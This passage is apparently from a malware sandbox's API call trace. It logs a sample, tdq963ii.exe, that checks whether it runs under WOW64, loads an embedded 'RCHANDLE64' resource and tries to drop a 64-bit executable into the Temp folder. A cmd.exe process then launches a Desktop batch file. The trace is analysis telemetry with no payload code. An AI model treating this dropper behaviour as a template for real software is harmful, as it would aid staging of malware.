[0228.513] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598838 | out: hHeap=0x580000) returned 1 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x800) returned 0x5987f8 [0228.513] GetLastError () returned 0x0 [0228.514] SetLastError (dwErrCode=0x0) [0228.514] GetLastError () returned 0x0 [0228.514] SetLastError (dwErrCode=0x0) [0228.514] GetLastError () returned 0x0 [0228.514] SetLastError (dwErrCode=0x0) [0228.514] GetACP () returned 0x4e4 [0228.514] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x220) returned 0x599000 [0228.514] GetLastError () returned 0x0 [0228.514] SetLastError (dwErrCode=0x0) [0228.514] IsValidCodePage (CodePage=0x4e4) returned 1 [0228.514] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0228.514] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0228.514] GetLastError () returned 0x0 [0228.514] SetLastError (dwErrCode=0x0) [0228.514] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0228.514] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0228.514] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0228.514] GetLastError () returned 0x0 [0228.514] SetLastError (dwErrCode=0x0) [0228.514] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0228.514] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0228.515] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0228.515] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0228.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿC\x95\x13 äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0228.515] GetLastError () returned 0x0 [0228.515] SetLastError (dwErrCode=0x0) [0228.515] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0228.515] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0228.515] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0228.515] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0228.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿC\x95\x13 äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0228.515] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x80) returned 0x599228 [0228.515] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0228.515] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0228.515] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x599228) returned 0x80 [0228.516] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0228.516] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0228.516] GetCurrentProcess () returned 0xffffffff [0228.516] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0228.516] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0228.516] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0228.516] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0228.516] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0228.516] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0228.516] LockResource (hResData=0x43c648) returned 0x43c648 [0228.516] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5996f8 [0228.517] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.517] GetLastError () returned 0x20 [0228.517] GetLastError () returned 0x20 [0228.517] SetLastError (dwErrCode=0x20) [0228.517] GetLastError () returned 0x20 [0228.517] SetLastError (dwErrCode=0x20) [0228.517] GetLastError () returned 0x20 [0228.517] SetLastError (dwErrCode=0x20) [0228.517] GetLastError () returned 0x20 [0228.517] SetLastError (dwErrCode=0x20) [0228.518] GetLastError () returned 0x20 [0228.518] SetLastError (dwErrCode=0x20) [0228.518] GetLastError () returned 0x20 [0228.518] SetLastError (dwErrCode=0x20) [0228.518] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1000) returned 0x599718 [0228.519] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0228.520] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5987f8 | out: hHeap=0x580000) returned 1 [0228.520] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0228.520] ExitProcess (uExitCode=0x1) [0228.520] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5970b0 | out: hHeap=0x580000) returned 1 Process: id = "234" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2b0b2000" os_pid = "0x7c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\WinMail.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 829 os_tid = 0xa8c [0231.239] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfad4 | out: lpSystemTimeAsFileTime=0x2cfad4*(dwLowDateTime=0x40f22840, dwHighDateTime=0x1d68287)) [0231.239] GetCurrentProcessId () returned 0x7c4 [0231.239] GetCurrentThreadId () returned 0xa8c [0231.239] GetTickCount () returned 0x116536e [0231.239] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfacc | out: lpPerformanceCount=0x2cfacc*=35157791957) returned 1 [0231.242] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0231.242] __set_app_type (_Type=0x1) [0231.242] __p__fmode () returned 0x770331f4 [0231.242] __p__commode () returned 0x770331fc [0231.242] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0231.242] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0231.243] GetCurrentThreadId () returned 0xa8c [0231.243] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa8c) returned 0x60 [0231.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0231.243] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0231.243] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.080] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa64 | out: phkResult=0x2cfa64*=0x0) returned 0x2 [0232.080] VirtualQuery (in: lpAddress=0x2cfa9b, lpBuffer=0x2cfa34, dwLength=0x1c | out: lpBuffer=0x2cfa34*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.080] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa34, dwLength=0x1c | out: lpBuffer=0x2cfa34*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.080] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa34, dwLength=0x1c | out: lpBuffer=0x2cfa34*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.080] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa34, dwLength=0x1c | out: lpBuffer=0x2cfa34*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.080] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa34, dwLength=0x1c | out: lpBuffer=0x2cfa34*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0232.080] GetConsoleOutputCP () returned 0x1b5 [0232.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0232.081] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0232.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.081] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0232.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.082] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.082] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0232.082] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.082] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.082] GetEnvironmentStringsW () returned 0x5420d8* [0232.083] GetProcessHeap () returned 0x530000 [0232.083] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xaca) returned 0x542bb0 [0232.083] FreeEnvironmentStringsW (penv=0x5420d8) returned 1 [0232.083] GetProcessHeap () returned 0x530000 [0232.083] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4) returned 0x541878 [0232.083] GetEnvironmentStringsW () returned 0x5420d8* [0232.083] GetProcessHeap () returned 0x530000 [0232.083] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xaca) returned 0x543688 [0232.083] FreeEnvironmentStringsW (penv=0x5420d8) returned 1 [0232.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9d4 | out: phkResult=0x2ce9d4*=0x68) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x0, lpData=0x2ce9e0*=0x0, lpcbData=0x2ce9d8*=0x1000) returned 0x2 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x1, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x0, lpData=0x2ce9e0*=0x1, lpcbData=0x2ce9d8*=0x1000) returned 0x2 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x0, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, 